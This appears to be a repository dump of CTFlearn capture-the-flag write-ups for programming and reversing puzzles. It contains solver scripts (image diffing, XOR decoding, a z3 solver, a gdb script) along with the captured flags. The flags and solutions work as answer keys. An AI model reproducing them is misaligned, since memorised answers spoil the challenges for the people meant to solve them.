After downloading `hisss.zip`, I got 2 images `1.png` & `2.png` in it.

#### Step-2:
Now if we zoom in, we see that some pixel manipulation has been done. So, I wrote a script `exploit.py` to get the flag.

```python
from PIL import Image

i1 = Image.open("1.png")
i2 = Image.open("2.png")

pixels = 512

pix1 = i1.load()
pix2 = i2.load()

for i in range(pixels):
    for j in range(pixels):
        if pix1[i,j] == pix2[i,j]:
            pix1[i,j] = 0
        else:
            pix1[i,j] = 255

i1.save("flag.png")
```

#### Step-3:
After I ran this as `python3 exploit.py`, I got this image `flag.png` which had the flag in it.

#### Step-4:
Finally, the flag becomes:
`CTF{I_L0V3_PYTH0N}`
--------------------------------------------------------------------------------
/Programming/Old memories/exploit.py:
--------------------------------------------------------------------------------
from PIL import Image

i1 = Image.open("1.png")
i2 = Image.open("2.png")

pixels = 512

pix1 = i1.load()
pix2 = i2.load()

for i in range(pixels):
    for j in range(pixels):
        if pix1[i,j] == pix2[i,j]:
            pix1[i,j] = 0
        else:
            pix1[i,j] = 255

i1.save("flag.png")

--------------------------------------------------------------------------------
/Programming/Old memories/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/flag.png
--------------------------------------------------------------------------------
/Programming/Old memories/hisss.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/hisss.zip
--------------------------------------------------------------------------------
/Programming/Programming a language/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Programming a language/Flag.png
--------------------------------------------------------------------------------
/Programming/Programming a language/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

s = "++++++++++++++++++++++++++++++++++++++++++++++++.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++.----------->@>>.<@<<<.@<@<@<++++<.<@<@<<@<-----.<<<<<.<@<@<+<.+>@.-------.-------->>>.<@<@<++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++>>>.<@<@<<.-----------<.>@>@<@><<.>@>@++++<.>@-----.>>>.<@<@<+<.>@+.-------.--------.+++++++++++++>>>>>>.<@<@<@<@<@<<.>@++.-------<.>@+++++++<<<.>@>@>@<<.>@>@<.>@-<.>@++++++++++++<<<.>@>@>@+++++++++++€"

values = [0]

for a in s:
    if a == '+':
        values[-1] += 1
    elif a == '-':
        values[-1] -= 1
    elif a == '<':
        x = [values[-1]]
        x.extend(values[:-1])
        values = x
    elif a == '@':
        values[-1], values[-2] = values[-2], values[-1]
    elif a == '>':
        values.append(values[0])
        values = values[1:]
    elif a == '.':
        values.append(values[-1])
    else: # a == '€':
        #print(''.join(map(chr, values)))
        flag = ''.join(map(chr, values))
        print("Flag: CTFlearn{" + flag + "}")
--------------------------------------------------------------------------------
/Programming/Programming a language/input.txt:
--------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++.----------->@>>.<@<<<.@<@<@<++++<.<@<@<<@<-----.<<<<<.<@<@<+<.+>@.-------.-------->>>.<@<@<++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++>>>.<@<@<<.-----------<.>@>@<@><<.>@>@++++<.>@-----.>>>.<@<@<+<.>@+.-------.--------.+++++++++++++>>>>>>.<@<@<@<@<@<<.>@++.-------<.>@+++++++<<<.>@>@>@<<.>@>@<.>@-<.>@++++++++++++<<<.>@>@>@+++++++++++€ -------------------------------------------------------------------------------- /Programming/Read in Color/README.md: -------------------------------------------------------------------------------- 1 | ## Read in Color 2 | The main idea of finding the flag is using PIL library in Python. 3 | 4 | #### Step-1: 5 | We are given this file `color_img.png` which is a follows: 6 | 7 | 8 | 9 | #### Step-2: 10 | After reading the description of challenge, I wrote a script `exploit.py`, which helped me to get a flag. 11 | 12 | ```py 13 | from PIL import Image 14 | from collections import OrderedDict 15 | 16 | #Image Load 17 | file = Image.open("color_img.png") 18 | rgb_mode = file.convert("RGB") 19 | width, height = file.size 20 | 21 | myrgbvalue = [] 22 | 23 | for i in range(width): 24 | for j in range(height): 25 | rgbvalue = rgb_mode.getpixel((i,j)) 26 | myrgbvalue.append(rgbvalue) 27 | 28 | values = [] 29 | orderedvalues = list(OrderedDict.fromkeys(myrgbvalue)) 30 | word = "" 31 | 32 | for tup in orderedvalues: 33 | for value in tup: 34 | word += chr(value) 35 | print(word) 36 | ``` 37 | 38 | #### Step-3: 39 | Executing the script as `python3 exploit.py`, I got the flag. 

#### Step-4:
Finally, the flag becomes:
`flag{c0l0r_c0d3d}`

--------------------------------------------------------------------------------
/Programming/Read in Color/color_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Read in Color/color_img.png

--------------------------------------------------------------------------------
/Programming/Read in Color/exploit.py:
--------------------------------------------------------------------------------
from PIL import Image
from collections import OrderedDict

file = Image.open("color_img.png")
rgb_mode = file.convert("RGB")
width, height = file.size

myrgbvalue = []

# Collect the RGB tuple of every pixel, column by column.
for i in range(width):
    for j in range(height):
        rgbvalue = rgb_mode.getpixel((i,j))
        myrgbvalue.append(rgbvalue)

values = []
# Keep each distinct colour once, in order of first appearance.
orderedvalues = list(OrderedDict.fromkeys(myrgbvalue))
word = ""

# Each channel value is read as one character code.
for tup in orderedvalues:
    for value in tup:
        word += chr(value)
print(word)

--------------------------------------------------------------------------------
/Programming/Simple Programming/Flag.py:
--------------------------------------------------------------------------------
count = 0

file = 'data.dat'

with open(file) as f:
    l = f.readlines()
    for line in l:
        zero = line.count('0')
        one = line.count('1')
        # the condition where the number of '0' is divisible by 3
        # OR the number of '1' is divisible by 2
        if (zero%3 == 0) or (one%2 == 0):
            count = count + 1

print("Number of lines: " + str(count))
f.close()

--------------------------------------------------------------------------------
/Programming/Simple Programming/README.md:
--------------------------------------------------------------------------------
## Simple Programming
The main idea of finding the flag is some simple counting in a file.

#### Step-1:
After we download `data.dat` from the cloud, we see that it has 10,000 lines. So we definitely need to write a script to get the answer.

#### Step-2:
So I quickly drafted the `Flag.py` script to get the number of such lines:

```py
count = 0

file = 'data.dat'

with open(file) as f:
    l = f.readlines()
    for line in l:
        zero = line.count('0')
        one = line.count('1')
        if (zero%3 == 0) or (one%2 == 0):
            count = count + 1

print("Number of lines: " + str(count))
f.close()
```

#### Step-3:
When we execute this script with `python3 Flag.py`, we get the flag.

Output:
`Number of lines: 6662`

#### Step-4:
Finally the flag becomes:
`CTFlearn{6662}`

--------------------------------------------------------------------------------
/Programming/The Adventures of Boris Ivanov Part 2/Concatenate.py:
--------------------------------------------------------------------------------
from PIL import Image

listimages=[]
for i in range(0,500):
    listimages.append(Image.open(str(i) + ".png")) # Make a list of pointers to the 500 pictures.

concatenate=Image.new("RGB",(500,500)) # Size of the concatenated picture
Y_offset=0

for i in listimages:
    concatenate.paste(i,(0,Y_offset))
    Y_offset+=1 # Add 1 at a time, because the height of each picture is 1.
concatenate.save("concatenate.png")

--------------------------------------------------------------------------------
/Programming/The Adventures of Boris Ivanov Part 2/concatenate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/The Adventures of Boris Ivanov Part 2/concatenate.png

--------------------------------------------------------------------------------
/Programming/The Adventures of Boris Ivanov Part 2/confetti.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/The Adventures of Boris Ivanov Part 2/confetti.zip

--------------------------------------------------------------------------------
/Programming/Weird Android Calculator/README.md:
--------------------------------------------------------------------------------
## What could this be?
The main idea of finding the flag is knowing programming in APK files.

#### Step-1:

I couldn't solve this challenge. So I had to look up writeups, and this was very good.

https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Programming/Medium/Weird%20Android%20Calculator

#### Step-5:

Finally the flag becomes:
`FLAG{APK_4nalys1s_1s_r4th3r_3asy_1snt_1t}`

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CTFlearn-Writeups

CTFlearn writeups of all the challenges I have solved. It covers all the domains including Cryptography, Forensics, Reversing, Pwning and other misc problems.

Link to CTF: [https://ctflearn.com/](https://ctflearn.com/)

## Challenges Category Wise

### 1. [Binary](./Binary/README.md)
### 2. [Cryptography](./Cryptography)
### 3. [Forensics](./Forensics)
### 4. [Miscellaneous](./Miscellaneous)
### 5. [Programming](./Programming)
### 6. [Reverse](./Reverse)
### 7. [Web](./Web)

---

© Rishit Saiya, IIT Dharwad

--------------------------------------------------------------------------------
/Reverse/Basic Android RE 1/BasicAndroidRE1.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Basic Android RE 1/BasicAndroidRE1.apk

--------------------------------------------------------------------------------
/Reverse/Basic Android RE 1/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Basic Android RE 1/Flag.png

--------------------------------------------------------------------------------
/Reverse/Bite-code/Bruteforce.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#pragma warning (disable : 4146)


/* Mirrors checkNum() from bitecode.txt: (x << 3) ^ (x ^ 525024598) == -889275714 */
void BruteForce()
{
    int flag , x1, x2, x3;
    flag = -2147483648; // The biggest negative value of 32bit.
    x3 = 0;
    while (x3 != -889275714)
    {
        x1 = flag << 3;
        x2 = flag ^ 525024598;
        x3 = x1 ^x2;
        flag += 1;
    }
    printf("%d \n", flag - 1);
}


int main(void)
{
    BruteForce();
    system("pause");
    return 0;
}

--------------------------------------------------------------------------------
/Reverse/Bite-code/bitecode.txt:
--------------------------------------------------------------------------------
public static boolean checkNum(int);
    descriptor: (I)Z
    flags: ACC_PUBLIC, ACC_STATIC
    Code:
      stack=2, locals=3, args_size=1
         0: iload_0
         1: iconst_3
         2: ishl
         3: istore_1
         4: iload_0
         5: ldc #2 // int 525024598
         7: ixor
         8: istore_2
         9: iload_1
        10: iload_2
        11: ixor
        12: ldc #3 // int -889275714
        14: if_icmpne 21
        17: iconst_1
        18: goto 22
        21: iconst_0
        22: ireturn
      LineNumberTable:
        line 3: 0
        line 4: 4
        line 5: 9
      StackMapTable: number_of_entries = 2
        frame_type = 253 /* append */
          offset_delta = 21
          locals = [ int, int ]
        frame_type = 64 /* same_locals_1_stack_item */
          stack = [ int ]

--------------------------------------------------------------------------------
/Reverse/Every Bit Counts/README.md:
--------------------------------------------------------------------------------
## Every Bit Counts
The main idea to find the flag is reversing.

#### Step-1:

https://www.youtube.com/watch?v=BUhEKDmcGv0

#### Step-2:
Finally, the flag becomes:
`CTFlearn{w0w_you_f0und_My_Fl@g_y0u_Ar3_so_much_n1c3}`

--------------------------------------------------------------------------------
/Reverse/Every Bit Counts/every_bit_counts:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Every Bit Counts/every_bit_counts

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/Flag.png

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/exec.png

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/exec.py:
--------------------------------------------------------------------------------
import base64
data = "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"
encodedBytes = base64.b64decode(data)
# Write the decoded bytes out as the binary to analyse.
with open("exec_bin", "wb") as execute_file:
    execute_file.write(encodedBytes)

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/exec_bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/exec_bin

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/exploit.py:
--------------------------------------------------------------------------------
import gdb

gdb.execute('break *0x80480af')
gdb.execute('run')

flag = ''
# Read the DL register at each of the 7 breakpoint hits.
for i in range(7):
    dl = gdb.parse_and_eval('$dl')
    flag += chr(int(dl))

    gdb.execute('continue')

print("CTFlearn{" + flag)

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/finish_the_flag/qr.asm.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/finish_the_flag/qr.asm.enc

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/finish_the_flag/qr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/finish_the_flag/qr.png

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/finish_the_flag/readme.txt:
--------------------------------------------------------------------------------
Once you have obtained the flag, you can read the source with:
openssl enc -d -aes-256-cbc -pbkdf2 -k FLAG -in qr.asm.enc -out qr.asm

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/letter.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/letter.zip

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/objdump.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/objdump.png

--------------------------------------------------------------------------------
/Reverse/Finish The Flag/qr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Finish The Flag/qr.png

--------------------------------------------------------------------------------
/Reverse/Jumper/flag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Jumper/flag

--------------------------------------------------------------------------------
/Reverse/Jumper/flag.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

int main(void) {
    char s[4] = "jum";
    int tmp;

    /* Reinterpret the four bytes "jum\0" as an int without an aliasing violation. */
    memcpy(&tmp, s, sizeof tmp);

    for (int i = 0; i <= 7; i++) {
        tmp += 5;
    }

    printf("Address: 0x%08X\n", tmp);

    return 0;
}

--------------------------------------------------------------------------------
/Reverse/Lost In The Binary/Crack.py:
--------------------------------------------------------------------------------
from z3 import *

a = Int('a') # qword_602148
b = Int('b') # qword_602150
c = Int('c') # qword_602158
d = Int('d') # qword_602160

s = Solver()
s.add(-24 * a + (-18 * b) + (-15 * c) + (-12 * d) == -18393)
s.add(9 * c + 18 * (b + a) + -9 * d == 4419)
s.add( 4 * c + 16 * a + 12 * b + 2 * d == 7300)
s.add(-6 * (b + a) + -3 * c+ -11 * d == -8613)
print(s.check())
print(s.model())
--------------------------------------------------------------------------------
/Reverse/Lost In The Binary/README.md:
--------------------------------------------------------------------------------
https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Reverse%20Engineering/Hard/Lost%20In%20The%20Binary

--------------------------------------------------------------------------------
/Reverse/Lost In The Binary/lost_in_bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Lost In The Binary/lost_in_bin

--------------------------------------------------------------------------------
/Reverse/PIN/README.md:
--------------------------------------------------------------------------------
## PIN
The main idea is finding the flag using IDA.

#### Step-1:
After we get the link:
[https://mega.nz/#!PXYjCKCY!F2gcs83XD6RxjOR-FNWGQZpyvUFvDbuT-PTnqRhBPGQ](https://mega.nz/#!PXYjCKCY!F2gcs83XD6RxjOR-FNWGQZpyvUFvDbuT-PTnqRhBPGQ), we get the binary file `rev1`.

#### Step-2:
Follow this:

https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Reverse%20Engineering/Medium/PIN

#### Step-3:
Finally the flag becomes:
`CTFlearn{333333}`

--------------------------------------------------------------------------------
/Reverse/PIN/rev1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PIN/rev1

--------------------------------------------------------------------------------
/Reverse/PIN/rev1.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PIN/rev1.i64
--------------------------------------------------------------------------------
/Reverse/PyDis/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/PyDis/Flag.png

--------------------------------------------------------------------------------
/Reverse/PyDis/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

def cipherOperation(c1, c2):
    return ord(c1)^c2

output = 'éÿîÅËÎÞÃÙóÙÕÎÈÊúèÞÎÜÌÌÕÓÕìùÂéçÆÐþÿñÖËîÿôÿ'
decodedDecArray = []
# Undo both XOR layers: the character's index, then the constant 170.
for i in range(len(output)):
    a = cipherOperation(output[i], i)
    a ^= 170
    decodedDecArray.append(a)

print("Flag: " + ''.join(map(chr, decodedDecArray)))

--------------------------------------------------------------------------------
/Reverse/RE_verseDIS/problem:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/RE_verseDIS/problem

--------------------------------------------------------------------------------
/Reverse/Ramada/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Flag.png

--------------------------------------------------------------------------------
/Reverse/Ramada/Ramada:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Ramada

--------------------------------------------------------------------------------
/Reverse/Ramada/Ramada.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/Ramada.zip

--------------------------------------------------------------------------------
/Reverse/Ramada/exploit.py:
--------------------------------------------------------------------------------
import numpy as np

data = [0x13693, 0x6b2c0, 0x11a9f9, 0x157000, 0x1cb91, 0x1bb528, 0x1bb528, 0xded21, 0x144f38, 0xfb89d, 0x169b48, 0xd151f, 0x8b98b, 0x17d140, 0xded21, 0x1338c0, 0x1338c0, 0x11a9f9, 0x1b000, 0x144f38, 0x1734eb]

flag = ""

# Each value is the cube of one character code, so take the cube root.
for d in data:
    i = int(round(np.cbrt(d)))
    flag += chr(i)

print("Flag: CTFlearn{" + flag + "}")

--------------------------------------------------------------------------------
/Reverse/Ramada/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Ramada/sources.zip.enc

--------------------------------------------------------------------------------
/Reverse/Rangoon/Rangoon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/Rangoon

--------------------------------------------------------------------------------
/Reverse/Rangoon/Rangoon.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/Rangoon.zip

--------------------------------------------------------------------------------
/Reverse/Rangoon/readme:
--------------------------------------------------------------------------------
This problem is a simple introduction to reversing.

If you have no experience with reversing but know a little of C/C++
these two YouTube videos from LiveOverflow will give you a
basic introduction to Reversing to help solve this challenge.

https://www.youtube.com/watch?v=VroEiMOJPm8
https://www.youtube.com/watch?v=3NTXFUxcKPc

If you are new to reversing my Reykjavik and Riyadh problems are
little easier than this one and you probably want to solve those
challenges first (after watching the above two videos :-) ).

If you go to the work of solving my Reversing Challenge, I'd like for you to
be able to see the sources if you are interested.

I have encrypted the zipped sources using the challenge flag as the
password to decrypt the sources. Solve the challenge, get the flag,
decrypt the sources.

openssl enc -d -aes-256-cbc -pbkdf2 -k flag -out sources.zip -in sources.zip.enc

Please don't share the flag with anyone else or share the sources used to
create the challenge or use this source to create your own challenge. Please.

I am on Twitter and Discord as @kcbowhunter. But I can't teach you Assembler or
Reversing, you have to learn that yourself. There are lots of good videos available
on YouTube, LiveOverflow is an excellent place to start. Good Luck!

--------------------------------------------------------------------------------
/Reverse/Rangoon/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rangoon/sources.zip.enc

--------------------------------------------------------------------------------
/Reverse/Raspberry/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Flag.png

--------------------------------------------------------------------------------
/Reverse/Raspberry/Raspberry:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Raspberry

--------------------------------------------------------------------------------
/Reverse/Raspberry/Raspberry.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/Raspberry.zip

--------------------------------------------------------------------------------
/Reverse/Raspberry/exploit.py:
--------------------------------------------------------------------------------
import subprocess
import string

output_len = 156
flag = ''

# Guess one character at a time: a change in output length marks a correct guess.
for i in range(19):
    for c in string.printable:
        out, _ = subprocess.Popen(
            ['./Raspberry', (flag+c).ljust(19, string.printable[-1])], stdout = subprocess.PIPE).communicate()
        if len(out) != output_len:
            output_len = len(out)
            flag += c
            break
print("Flag: " + flag)

--------------------------------------------------------------------------------
/Reverse/Raspberry/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Raspberry/sources.zip.enc

--------------------------------------------------------------------------------
/Reverse/Recklinghausen/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Flag.png

--------------------------------------------------------------------------------
/Reverse/Recklinghausen/Recklinghausen:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Recklinghausen

--------------------------------------------------------------------------------
/Reverse/Recklinghausen/Recklinghausen.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/Recklinghausen.zip

--------------------------------------------------------------------------------
/Reverse/Recklinghausen/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

def bytes_to_array(dat, sz):
    dat = dat.split()
    arr = []
    for i in range(0, len(dat), sz):
        arr.append(int(''.join(reversed(dat[i:i+sz])), 16))
    return arr

msg5 = "21 7e 3d 2a 38 12 1b 1f 0c 10 05 2c 0b 16 0c 18 1b 0d 0a 0d 0e 17 1b 12 1b 21 38 1b 0d 0a 17 08 1f 12 03"
msg5 = bytes_to_array(msg5, 1)

def uncheck():
    # msg5[0] is the length, msg5[1] the XOR key, the payload starts at msg5[2].
    buf = [0]*msg5[0]

    if msg5[0] != 0:
        for i in range(msg5[0]):
            buf[i] = msg5[i+2] ^ msg5[1]
    return buf

buf = uncheck()
flag = ''.join(map(chr, buf))
print("Flag: " + flag)

--------------------------------------------------------------------------------
/Reverse/Recklinghausen/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Recklinghausen/sources.zip.enc

--------------------------------------------------------------------------------
/Reverse/Reverse Me/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reverse Me/Flag.png

--------------------------------------------------------------------------------
/Reverse/Reverse Me/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

expected = [0] * 26
expected[0] = ord('W')
expected[1] = 0x42
expected[2] = 0x4b
expected[3] = 0x45
expected[4] = 0xcc
expected[5] = 0xbb
expected[6] = 0x81
expected[7] = 0xcc
expected[8] = 0x71
expected[9] = 0x7a
expected[10] = 0x71
expected[11] = 0x66
expected[12] = 0xdf
expected[13] = 0xbb
expected[14] = 0x86
expected[15] = 0xcd
expected[16] = 100
expected[17] = 0x6f
expected[18] = 0x6e
expected[19] = 0x5c
expected[20] = 0xf2
expected[21] = 0xad
expected[22] = 0x9a
expected[23] = 0xd8
expected[24] = 0x7e
expected[25] = 0x6f

def unshuffle(param):
    # Swap each pair of adjacent bytes back into place.
    buf = [0] * len(param)

    for i in range(0, len(param)-1, 2):
        buf[i+1] = param[i]

    for i in range(1, len(param), 2):
        buf[i-1] = param[i]

    return buf

def decrypt(block):
    # XOR with the repeating 8-byte key.
    local_48 = [1, 3, 3, 7, 0xde, 0xad, 0xbe, 0xef]
    buf = [0] * len(block)
    ind = 0

    for i in range(len(block)):
        buf[i] = block[i] ^ local_48[ind]
        ind = (ind+1) % len(local_48)
    return buf

buf = unshuffle(expected)
buf = decrypt(buf)
flag = ''.join(map(chr, buf))

print("Flag: " + flag)

--------------------------------------------------------------------------------
/Reverse/Reverse Me/reverseme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reverse Me/reverseme

--------------------------------------------------------------------------------
/Reverse/Reykjavik/README.md:
--------------------------------------------------------------------------------
## Reykjavik
The main idea to find the flag is to use GDB to navigate across instructions.

#### Step-1:
Using `gdb -q Reykjavik`, we can hop to the `main` function using breakpoints. The command for that is `b * main`. After reaching it, stepping with `ni` (next instruction) lands us on the flag, as mentioned below.
6 | 7 | #### Step-2: 8 | Finally, the flag becomes: 9 | `CTFlearn{Eye_L0ve_Iceland_U}` -------------------------------------------------------------------------------- /Reverse/Reykjavik/Reykjavik: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reykjavik/Reykjavik -------------------------------------------------------------------------------- /Reverse/Reykjavik/Reykjavik.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Reykjavik/Reykjavik.zip -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Flag.png -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/Rotterdam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Rotterdam -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/Rotterdam_1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Rotterdam_1.zip -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/exploit.py: 
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Each flag chunk is rebuilt from constants: compute the value, read its hex
# digits as ASCII bytes, then reverse them (the bytes come out little-endian).
prefix = 'CTFlearn{'
kernel = []

# Chunk 1: XOR of two 64-bit constants
s = hex(0x2a460d92f5a1f504^0x4b227ff781d59a56)[2:]
param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)]))))
kernel.append(param)

